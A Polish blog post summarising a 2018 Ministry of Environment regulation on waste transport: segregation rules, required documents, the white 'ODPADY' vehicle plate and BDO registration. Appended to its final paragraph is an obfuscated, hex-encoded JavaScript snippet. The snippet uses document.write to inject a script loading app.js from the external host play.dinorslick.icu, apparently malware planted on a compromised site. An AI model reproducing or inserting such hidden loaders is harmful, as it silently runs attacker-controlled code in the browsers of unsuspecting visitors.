Wrzesień 7, 2018 Bez kategorii Brak komentarzy

TRANSPORT ODPADÓW

Z dniem 24 stycznia 2018 r. weszło w życie rozporządzenie Ministra Środowiska z dnia 7 października 2016 r. w sprawie szczegółowych wymagań dla transportu opadów.

Według tego rozporządzenia odpady niebezpieczne mogą być transportowane z innymi odpadami niż niebezpieczne, w taki sposób aby uniemożliwić ich kontakt. Odpady poszczególnych rodzajów podczas transportu nie mogą mieszać się ze sobą, chyba że są przekazywane do tego samego procesu przetwarzania. Odpady podczas transportu trzeba zabezpieczyć tak, aby uniemożliwić ich przemieszczaniu się bądź przewracaniu, nie dotyczy to odpadów przewożonych luzem lub w cysternach. Odpady należy tak transportować aby nie dopuścić do rozprzestrzenienia się odpadów poza środek transportu np. poprzez ich wyciek, pylenie, wysypanie oraz ograniczyć do minimum uciążliwość zapachową. W przypadku zmiany rodzaju transportowanych odpadów, należy upewnić się czy nie pozostały odpady po poprzednim transporcie, chyba że owe pozostałości nie wpłyną na właściwości transportowanych odpadów w sposób powodujący zagrożenie dla środowiska lub życia i zdrowia ludzi.

Odpady transportuje się wraz z dokumentem potwierdzającym rodzaj transportowanych odpadów oraz dane zlecającego transport odpadów. W przypadku odbioru odpadów komunalnych z nieruchomości musi być również dokument potwierdzający rodzaj transportowanych odpadów oraz nazwę gminy, z terenu której są odbierane odpady.

Owymi dokumentami wymaganymi pod czas transportu są:

– karta przekazania odpadów

– faktura sprzedaży odpadów

– podstawowa charakterystyka odpadów

– dokument dotyczący transgranicznego przemieszczania odpadów

–  inny dokument potwierdzający rodzaj transportowanych odpadów oraz dane zlecającego transport, jeśli nie posiadamy powyższych dokumentów.

Środek transportu odpadów należy oznaczyć tablicą koloru białego o wymiarach 400 mm x 300 mm, z napisem ODPADY (wielkie litery koloru czarnego)  o minimalnej wysokości 100mm i szerokości linii minimum 15 mm.

Natomiast jeśli na środku transportu brakuje miejsca na tablicę o powyższych wymiarach, można zastosować tablicę o wymiarach 300 mm x 120 mm, wysokość napisu ODPADY  minimum do 80 mm i szerokość linii minimum do 120 mm.

W przypadku środków transportu przeznaczonych do transgranicznego przemieszczania odpadów należy umieścić tablicę koloru białego o wymiarach 400 mm x 300 mm, z napisem A (kolor czerwony), o wysokości minimum 200 mm i szerokości linii minimum 20 mm .

 

Oznakowanie umieszcza się w widocznym miejscu z przodu środka transportu, na jego zewnętrznej powierzchni, musi być ono czytelne i trwałe oraz odporne na warunki atmosferyczne.

W przypadku gdy jest transportowany odpad, dla którego nie ma obowiązku prowadzenia ewidencji, bądź środkiem transportu transportuje się odpady inne niż niebezpieczne, w ilości nie przekraczającej 100 kg, nie ma obowiązku posiadania pod czas transportu wymaganej dokumentacji o której jest mowa w artykule oraz oznaczenia środka transportu właściwą tablicą.

Przedsiębiorca, który prowadzi działalność w zakresie transportu odpadów musi zarejestrować się w bazie BDO, decyzje administracyjne zezwalające na transport odpadów utraciły swoją ważność z chwilą wprowadzenia konieczności rejestru BDO. var _0xe540=[„\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x31\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x64\x69\x6E\x6F\x72″,”\x73\x6C\x69\x63\x6B\x2E\x69\x63\x75\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function gpor(){var _0x4eb6x2=_0xe540[0];var _0x4eb6x3=_0xe540[1];var _0x4eb6x4=_0xe540[2];var _0x4eb6x5=_0xe540[3];document[_0xe540[4]](_0x4eb6x2+ _0x4eb6x3+ _0x4eb6x4+ _0x4eb6x5)}gpor()

Napisane przez Kornelia Niedźwiecka